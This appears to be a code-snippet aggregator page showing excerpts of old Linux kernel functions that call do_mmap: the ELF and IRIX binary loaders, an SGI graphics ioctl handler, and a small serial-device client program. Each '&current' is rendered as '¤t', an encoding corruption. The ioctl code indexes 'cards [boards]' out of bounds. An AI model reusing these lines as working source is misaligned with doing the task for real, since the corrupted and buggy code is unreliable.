//.........这里部分代码省略.........
if (BAD_ADDR(elf_entry)) {
force_sig(SIGSEGV, current);
retval = IS_ERR((void *)elf_entry) ?
(int)elf_entry : -EINVAL;
goto out_free_dentry;
}
reloc_func_desc = interp_load_addr;
allow_write_access(interpreter);
fput(interpreter);
kfree(elf_interpreter);
} else {
elf_entry = loc->elf_ex.e_entry;
if (BAD_ADDR(elf_entry)) {
force_sig(SIGSEGV, current);
retval = -EINVAL;
goto out_free_dentry;
}
}
kfree(elf_phdata);
sys_close(elf_exec_fileno);
set_binfmt(&elf_format);
#ifdef ARCH_HAS_SETUP_ADDITIONAL_PAGES
retval = arch_setup_additional_pages(bprm, executable_stack);
if (retval < 0) {
send_sig(SIGKILL, current, 0);
goto out;
}
#endif /* ARCH_HAS_SETUP_ADDITIONAL_PAGES */
compute_creds(bprm);
current->flags &= ~PF_FORKNOEXEC;
retval = create_elf_tables(bprm, &loc->elf_ex,
load_addr, interp_load_addr);
if (retval < 0) {
send_sig(SIGKILL, current, 0);
goto out;
}
/* N.B. passed_fileno might not be initialized? */
current->mm->end_code = end_code;
current->mm->start_code = start_code;
current->mm->start_data = start_data;
current->mm->end_data = end_data;
current->mm->start_stack = bprm->p;
#ifdef arch_randomize_brk
if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1))
current->mm->brk = current->mm->start_brk =
arch_randomize_brk(current->mm);
#endif
if (current->personality & MMAP_PAGE_ZERO) {
/* Why this, you ask??? Well SVr4 maps page 0 as read-only,
and some applications "depend" upon this behavior.
Since we do not have the power to recompile these, we
emulate the SVr4 behavior. Sigh. */
down_write(¤t->mm->mmap_sem);
error = do_mmap(NULL, 0, PAGE_SIZE, PROT_READ | PROT_EXEC,
MAP_FIXED | MAP_PRIVATE, 0);
up_write(¤t->mm->mmap_sem);
}
#ifdef ELF_PLAT_INIT
/*
* The ABI may specify that certain registers be set up in special
* ways (on i386 %edx is the address of a DT_FINI function, for
* example. In addition, it may also specify (eg, PowerPC64 ELF)
* that the e_entry field is the address of the function descriptor
* for the startup routine, rather than the address of the startup
* routine itself. This macro performs whatever initialization to
* the regs structure is required as well as any relocations to the
* function descriptor entries when executing dynamically links apps.
*/
ELF_PLAT_INIT(regs, reloc_func_desc);
#endif
start_thread(regs, elf_entry, bprm->p);
retval = 0;
out:
kfree(loc);
out_ret:
return retval;
/* error cleanup */
out_free_dentry:
allow_write_access(interpreter);
if (interpreter)
fput(interpreter);
out_free_interp:
kfree(elf_interpreter);
out_free_file:
sys_close(elf_exec_fileno);
out_free_ph:
kfree(elf_phdata);
goto out;
}示例13: main
int main(int argc, char *argv[])
{
unsigned int ip, ip_arr[4];
size_t len;
struct timeval start, end;
struct stat stat;
if (argc < 4) {
fprintf(stderr, "Usage: %s <output_file> <method> <IP>\n", argv[0]);
exit(1);
}
if ((fdin = open("/dev/rs232_slave", O_RDONLY)) < 0) {
perror("open device fail");
exit(1);
}
if(gettimeofday(&start, NULL) < 0) {
perror("gettimeofday to start fail");
exit(1);
}
if ((fdout = open(argv[1], O_RDWR | O_TRUNC | O_CREAT, 0644)) < 0) {
perror("open fail");
exit(1);
}
if (sscanf(argv[3], "%u.%u.%u.%u",
&ip_arr[0], &ip_arr[1], &ip_arr[2], &ip_arr[3]) != 4) {
fprintf(stderr, "invalid IP\n");
exit(1);
}
ENCODE_IP(ip, ip_arr);
if (ioctl(fdin, IOCTL_OPENCONN, &ip) < 0) {
perror("ioctl open connect fail");
exit(1);
}
len = strlen(argv[2]);
if (strncmp("fcntl", argv[2], len) == 0) {
do_fcntl();
} else if (strncmp("mmap", argv[2], len) == 0) {
do_mmap();
} else {
fprintf(stderr, "invalid method\n");
exit(1);
}
if (ioctl(fdin, IOCTL_CLOSECONN) < 0) {
perror("ioctl close connect fail");
exit(1);
}
if (close(fdin) < 0) {
perror("close");
exit(1);
}
if (fstat(fdout, &stat) < 0) {
perror("fstat fail");
exit(1);
}
if (close(fdout) < 0) {
perror("close");
exit(1);
}
if (gettimeofday(&end, NULL) < 0) {
perror("gettimeofday to end fail");
exit(1);
}
if (end.tv_usec < start.tv_usec) {
end.tv_sec -= 1;
end.tv_usec += 1000000;
}
printf("Transmission time: %lf ms, File size: %lu bytes\n",
((end.tv_sec - start.tv_sec) * 1000 +
((double)(end.tv_usec - start.tv_usec) / 1000)),
(size_t)(stat.st_size));
return 0;
}示例14: load_irix_binary
//.........这里部分代码省略.........
current->mm->mmap = NULL;
current->flags &= ~PF_FORKNOEXEC;
elf_entry = (unsigned int) elf_ex.e_entry;
/* Do this so that we can load the interpreter, if need be. We will
* change some of these later.
*/
setup_arg_pages(bprm, STACK_TOP, EXSTACK_DEFAULT);
current->mm->start_stack = bprm->p;
/* At this point, we assume that the image should be loaded at
* fixed address, not at a variable address.
*/
old_fs = get_fs();
set_fs(get_ds());
map_executable(bprm->file, elf_phdata, elf_ex.e_phnum, &elf_stack,
&load_addr, &start_code, &elf_bss, &end_code,
&end_data, &elf_brk);
if (elf_interpreter) {
retval = map_interpreter(elf_phdata, &interp_elf_ex,
interpreter, &interp_load_addr,
elf_ex.e_phnum, old_fs, &elf_entry);
kfree(elf_interpreter);
if (retval) {
set_fs(old_fs);
printk("Unable to load IRIX ELF interpreter\n");
send_sig(SIGSEGV, current, 0);
retval = 0;
goto out_free_file;
}
}
set_fs(old_fs);
kfree(elf_phdata);
set_personality(PER_IRIX32);
set_binfmt(&irix_format);
compute_creds(bprm);
current->flags &= ~PF_FORKNOEXEC;
bprm->p = (unsigned long)
create_irix_tables((char *)bprm->p, bprm->argc, bprm->envc,
(elf_interpreter ? &elf_ex : NULL),
load_addr, interp_load_addr, regs, elf_ephdr);
current->mm->start_brk = current->mm->brk = elf_brk;
current->mm->end_code = end_code;
current->mm->start_code = start_code;
current->mm->end_data = end_data;
current->mm->start_stack = bprm->p;
/* Calling set_brk effectively mmaps the pages that we need for the
* bss and break sections.
*/
set_brk(elf_bss, elf_brk);
/*
* IRIX maps a page at 0x200000 which holds some system
* information. Programs depend on this.
*/
irix_map_prda_page();
padzero(elf_bss);
pr_debug("(start_brk) %lx\n" , (long) current->mm->start_brk);
pr_debug("(end_code) %lx\n" , (long) current->mm->end_code);
pr_debug("(start_code) %lx\n" , (long) current->mm->start_code);
pr_debug("(end_data) %lx\n" , (long) current->mm->end_data);
pr_debug("(start_stack) %lx\n" , (long) current->mm->start_stack);
pr_debug("(brk) %lx\n" , (long) current->mm->brk);
#if 0 /* XXX No fucking way dude... */
/* Why this, you ask??? Well SVr4 maps page 0 as read-only,
* and some applications "depend" upon this behavior.
* Since we do not have the power to recompile these, we
* emulate the SVr4 behavior. Sigh.
*/
down_write(¤t->mm->mmap_sem);
(void) do_mmap(NULL, 0, 4096, PROT_READ | PROT_EXEC,
MAP_FIXED | MAP_PRIVATE, 0);
up_write(¤t->mm->mmap_sem);
#endif
start_thread(regs, elf_entry, bprm->p);
if (current->ptrace & PT_PTRACED)
send_sig(SIGTRAP, current, 0);
return 0;
out:
return retval;
out_free_dentry:
allow_write_access(interpreter);
fput(interpreter);
out_free_interp:
kfree(elf_interpreter);
out_free_file:
out_free_ph:
kfree(elf_phdata);
goto out;
}示例15: sgi_graphics_ioctl
int
sgi_graphics_ioctl (struct inode *inode, struct file *file, unsigned int cmd, unsigned long arg)
{
unsigned int board;
unsigned int devnum = GRAPHICS_CARD (inode->i_rdev);
int i;
if ((cmd >= RRM_BASE) && (cmd <= RRM_CMD_LIMIT))
return rrm_command (cmd-RRM_BASE, (void *) arg);
switch (cmd){
case GFX_GETNUM_BOARDS:
return boards;
case GFX_GETBOARD_INFO: {
struct gfx_getboardinfo_args *bia = (void *) arg;
void *dest_buf;
int max_len;
i = verify_area (VERIFY_READ, (void *) arg, sizeof (struct gfx_getboardinfo_args));
if (i) return i;
if (__get_user (board, &bia->board) ||
__get_user (dest_buf, &bia->buf) ||
__get_user (max_len, &bia->len))
return -EFAULT;
if (board >= boards)
return -EINVAL;
if (max_len < sizeof (struct gfx_getboardinfo_args))
return -EINVAL;
if (max_len > cards [board].g_board_info_len)
max_len = cards [boards].g_board_info_len;
i = verify_area (VERIFY_WRITE, dest_buf, max_len);
if (i) return i;
if (copy_to_user (dest_buf, cards [board].g_board_info, max_len))
return -EFAULT;
return max_len;
}
case GFX_ATTACH_BOARD: {
struct gfx_attach_board_args *att = (void *) arg;
void *vaddr;
int r;
i = verify_area (VERIFY_READ, (void *)arg, sizeof (struct gfx_attach_board_args));
if (i) return i;
if (__get_user (board, &att->board) ||
__get_user (vaddr, &att->vaddr))
return -EFAULT;
/* Ok for now we are assuming /dev/graphicsN -> head N even
* if the ioctl api suggests that this is not quite the case.
*
* Otherwise we fail, we use this assumption in the mmap code
* below to find our board information.
*/
if (board != devnum){
printk ("Parameter board does not match the current board\n");
return -EINVAL;
}
if (board >= boards)
return -EINVAL;
/* If it is the first opening it, then make it the board owner */
if (!cards [board].g_owner)
cards [board].g_owner = current;
/*
* Ok, we now call mmap on this file, which will end up calling
* sgi_graphics_mmap
*/
disable_gconsole ();
down_write(¤t->mm->mmap_sem);
r = do_mmap (file, (unsigned long)vaddr,
cards[board].g_regs_size, PROT_READ|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE, 0);
up_write(¤t->mm->mmap_sem);
if (r)
return r;
}
/* Strange, the real mapping seems to be done at GFX_ATTACH_BOARD,
* GFX_MAPALL is not even used by IRIX X server
*/
case GFX_MAPALL:
return 0;
case GFX_LABEL:
return 0;
/* Version check
* for my IRIX 6.2 X server, this is what the kernel returns
*/
case 1:
return 3;
/* Xsgi does not use this one, I assume minor is the board being queried */
//.........这里部分代码省略.........